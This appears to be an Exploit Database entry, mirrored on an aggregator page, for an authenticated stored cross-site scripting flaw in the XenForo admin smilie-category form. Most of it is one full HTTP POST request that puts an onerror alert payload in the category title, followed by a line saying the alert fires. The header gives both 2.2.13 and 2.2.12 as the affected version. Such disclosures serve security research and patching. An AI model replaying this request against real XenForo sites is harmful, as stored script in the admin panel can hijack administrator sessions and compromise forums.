Xenforo Version 2.2.13 – Authenticated Stored XSS

• Exploit Database
• 18 阅读

• 作者： Furkan Karaarslan
  日期： 2023-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51547/

• # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
  # Date: 2023-06-24
  # Exploit Author: Furkan Karaarslan
  # Category : Webapps
  # Vendor Homepage: https://x.com/admin.php?smilies
  # Version: 2.2.12 (REQUIRED)
  # Tested on: Windows/Linux
  # CVE : 
  
  -----------------------------------------------------------------------------
  Requests
  
  POST /admin.php?smilie-categories/0/save HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1/admin.php?smilies/
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
  Content-Length: 1038
  Origin: http://127.0.0.1
  Connection: close
  Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="_xfToken"
  
  1687616851,83fd2350307156281e51b17e20fe575b
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="title"
  
  <img src=x onerror=alert(document.domain)>
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="display_order"
  
  1
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="_xfRequestUri"
  
  /admin.php?smilies/
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="_xfWithData"
  
  1
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="_xfToken"
  
  1687616849,b74724a115448b864ba2db8f89f415f5
  -----------------------------333176689514537912041638543422
  Content-Disposition: form-data; name="_xfResponseType"
  
  json
  -----------------------------333176689514537912041638543422--
  
  
  Response: After it is created, an alert comes immediately.